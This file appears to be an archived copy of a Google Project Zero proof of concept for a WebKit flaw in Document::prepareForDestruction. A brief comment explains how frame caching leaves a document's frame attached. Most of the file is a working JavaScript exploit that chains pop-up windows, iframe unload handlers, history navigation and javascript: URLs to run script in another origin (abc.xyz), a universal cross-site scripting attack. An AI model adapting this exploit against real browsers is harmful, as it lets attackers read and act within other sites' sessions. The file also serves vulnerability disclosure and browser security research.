1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 |
<!-- Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1163 Here's a snippet of Document::prepareForDestruction void Document::prepareForDestruction() { if (m_hasPreparedForDestruction) return; ... detachFromFrame(); m_hasPreparedForDestruction = true; } Document::prepareForDestruction is called on the assumption that the document will not be used again with its frame. However, if a frame caching is made in Document::prepareForDestruction, the document's frame will be stored in a CachedFrame object that will reattach the frame at some point, and thereafter, the document's frame will be never detached due to |m_hasPreparedForDestruction|. PoC: --> <body> Click anywhere. <script> function createURL(data, type = 'text/html') { return URL.createObjectURL(new Blob([data], {type: type})); } function waitFor(check, cb) { let it = setInterval(() => { if (check()) { clearInterval(it); cb(); } }, 10); } window.onclick = () => { window.onclick = null; w = open(createURL(''), '', 'width=500, height=500'); w.onload = () => { setTimeout(() => { let f = w.document.body.appendChild(document.createElement('iframe')); f.contentWindow.onunload = () => { f.contentWindow.onunload = null; w.__defineGetter__('navigator', () => new Object()); let a = w.document.createElement('a'); a.href = 'about:blank'; a.click(); setTimeout(() => { w.history.back(); setTimeout(() => { let d = w.document; w.location = 'javascript:' + encodeURI(<code>"<script>location = 'https://abc.xyz/';</scrip</code> + <code>t>"</code>); let it = setInterval(() => { try { w.xxxx; } catch (e) { clearInterval(it); let a = d.createElement('a'); a.href = 'javascript:alert(location);'; a.click(); } }, 10); }, 100); }, 100); }; w.location = 'javascript:""'; }, 0); }; } </script> </body> |